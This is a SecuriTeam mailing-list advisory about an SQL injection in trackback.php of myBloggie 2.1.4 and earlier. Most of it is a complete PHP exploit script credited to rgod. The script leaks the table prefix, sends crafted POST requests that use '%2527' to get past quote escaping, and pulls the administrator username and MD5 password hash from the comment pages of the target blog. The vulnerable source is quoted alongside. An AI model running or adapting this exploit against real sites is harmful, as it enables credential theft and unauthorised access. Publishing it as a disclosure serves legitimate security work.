[EXPL] myBlogger trackback SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



myBlogger trackback SQL Injection
------------------------------------------------------------------------


SUMMARY

<http://mybloggie.mywebland.com/> myBloggie is "considered one of the
most simple, user-friendliest yet packed with features Weblog system
available to date". A vulnerability in myBloggie allows remote attackers
to cause an SQL injection in the product, which in turn can be used to
disclose the administrative password (HASH).

DETAILS

Vulnerable Systems:
* MyBloggie version 2.1.4 and prior

Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections
vulnerability /\n";
echo "administrative credentials disclosure exploit\n";
echo "by rgod rgod@xxxxxxxxxxxxx\n";
echo "site: http://retrogod.altervista.org\n\n";;

/*
works regardless of php.ini settings
against MySQL >= 4.1 (allowing subs)
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to MyBloggie\n";
echo "Options:\n";
echo " -i specify an existent post id (default: 1)\n";
echo " -T[prefix] specify a table prefix different from default
(mb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -d: disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";
die;
}

/* software site: http://mybloggie.mywebland.com/

vulnerable code in trackback.php:

..
if(!empty($_REQUEST['title'])) {
$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason :
No title</p>"); }

if(!empty($_REQUEST['url'])) {
$url=urldecode($_REQUEST['url']);

if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry,
Trackback failed.. Reason : URL not valid</p>"); }
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason :
No URL</p>"); }

if(!empty($_REQUEST['excerpt']))
{
$excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));
} else {
$tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No
Excerpt</p>");
}

// The blog name
if(!empty($_REQUEST['blog_name']))
{

$blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));
} else
{
$blog_name="No Blog Name";
}

$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(),
$timezone ),
gmtdate('s', time(), $timezone ), gmtdate('n', time(),
$timezone ),
gmtdate('d', time(), $timezone ), gmtdate('Y', time(),
$timezone ));

$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id',
comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,
poster = '$blog_name', home='$url',
comment_type='trackback'";

$result = $db->sql_query($sql) or die("Cannot query the database.<br>" .
mysql_error());
..

you have sql injection in 'title', 'url', 'excerpt' and 'blog_name'
argument
with MySQL >= 4.1 that allows SELECT subqueries for INSERT...

so you can insert admin username & password hash inside comments and you
will see them at screen
also arguments are passed to urldecode(), so you can bypass
magic_quotes_gpc
with '%2527' sequence for the single quote char
adn you can disclose table prefix going to:

http://192.168.1.3/mybloggie/index.php?mode=viewdate

you will have an error that disloses a query fragment

-

ex., injecting code in 'title' argument, query becomes:

INSERT INTO mb_comment SET post_id='1',
comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM
mb_user)/*', comments='whatever', com_tstamp='1154799697' ,
poster = 'whatever', home='http://www.suntzu.org',
comment_type='trackback'
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mb_";
$post_id="1";//admin
$proxy="";
$dt=0;

for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-i")
{
$post_id=(int) str_replace("-i","",$argv[$i]);
echo "post id -> ".$post_id."\n";
}
if ($temp=="-d")
{
$dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error...
check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)
{
$packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("UNIXTIME(",$html);
$temp2=explode("posts.timest",$temp[1]);
$prefix=$temp2[0];
echo "table prefix -> ".$prefix."\n";
}
}

$sql="%2527,comments=(SELECT
CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM ".$prefix."user)/*";
//some problems with argument length, maybe with prefix > 3 chars you will
have some error, cut the '<!--' but hash will be clearly visible in
comments
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM
".$prefix."user)/*";
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp=explode('"message"><!--',$html);
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode("-->",$temp[$i]);
if (is_hash($temp2[0]))
{
$hash=$temp2[0];
$temp2=explode("-->",$temp[$i+1]);
$admin=$temp2[0];
echo
"----------------------------------------------------------------\n";
echo "admin -> ".$admin."\n";
echo "password (md5) -> ".$hash."\n";
echo
"----------------------------------------------------------------\n";
die();
}
}
//if you are here...
echo "exploit failed...";
?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:rgod@xxxxxxxxxxxxx> rgod.
The original article can be found at:
<http://retrogod.altervista.org/mybloggie_214_sql.html>
http://retrogod.altervista.org/mybloggie_214_sql.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages